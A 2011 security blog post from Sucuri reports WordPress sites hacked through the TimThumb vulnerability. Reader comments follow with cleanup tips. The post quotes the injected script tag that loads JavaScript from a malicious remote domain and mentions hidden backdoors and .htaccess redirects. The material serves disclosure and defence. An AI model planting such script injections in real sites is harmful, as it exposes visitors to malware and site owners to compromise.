• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

WordPress Sites Hacked with Superpuperdomain2.com

August 13, 2011David Dede

FacebookTwitterSubscribe

A few days ago we posted about a series of attacks that were happening against WordPress sites running the vulnerable timthumb.php script.

We detected thousands of sites compromised with it and now are are seeing a small change in the malware. Instead of superpuperdomain.com, the malware is now pointing to a remote javascript from superpuperdomain2.com (see extra 2 in there). This is what it shows up in the compromised sites:

<script language="javascript" SRC="http://superpuperdomain2.com/count.php?ref="

That is code is generated by an echo statement hidden within one of the WordPress core files and is always accompanied of multiple backdoors and even .htaccess redirections (to http://generation-internet.ru and other russian sites).

Both domains were registered by Archil Karsaulidze (probably fake) and are pointing to 91.196.216.20:

Archil Karsaulidze admin@superpuperdomain.com
+74957261532 fax: +74957261532
Novopeschanaya, 3-28
Moscow Moscowscaya Oblast 107263
ru

How are the sites getting compromised?

On the sites we’ve analyzed, they were hacked through the timthumb.php vulnerability that was published a few days ago. The attackers are also creating a bunch of backdoors to maintain their access to the hacked sites.

If you are using the timthumb.php scripts, remove or update it now!.

Keeping yourself secure

This is not a vulnerability in WordPress, it is a vulnerability found in various WordPress themes that include TimThumb! You have to make sure that you are using an updated theme, and from a legitimate source. Otherwise your theme may contain this vulnerability, or others (even backdoors), that may not be given the proper attention by their theme authors.

If you’re not sure, you can do a free scan of your site using Sucuri SiteCheck

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, Website Malware Infections, WordPress SecurityTags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. MaXe

    August 14, 2011

    If you’re unsure what the filename for “timthumb” is, as it may have been renamed, log into the server and issue this command: (Thanks to rAWjAW)
    find . | grep php | xargs grep -s timthumb

    It will find any PHP file with the word “timthumb” within it. (Your site may be vulnerable, even though there’s no such filename as timthumb.php. The filename does not matter, as the theme developer could’ve just renamed the file. Kinda like renaming a program named trojan.exe to screensaver.exe, but the contents does not alter.)

    ~ MaXe

  2. Sharklauncher

    August 16, 2011

    If you don’t see any of the above backdoors, do the following:

    1. Patch your thumb.php/timthumb.php files.

    2. Search and remove (back up first) any files in your theme directories named the following: “log.php”, “sm3.php”, “wp.php”, “r1.php”, “data.php”, and “stats.php”.  

    You may want to verify that they’re not valid files before deletion.

    3. Edit your .htaccess files and remove everything below the standard WordPress options (there is “hidden” redirect code way off to the lower right).

  3. Carol

    August 22, 2011

    Wow, how scary.  Even websites aren’t safe. Thank you for this!

  4. John Overall

    August 23, 2011

    You may also want to ass the plugin WordPress File Monitor Plus to monitor all changes to your site. This plugin is fantastic for monitoring your site for any unusual changes..

    John Overall

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.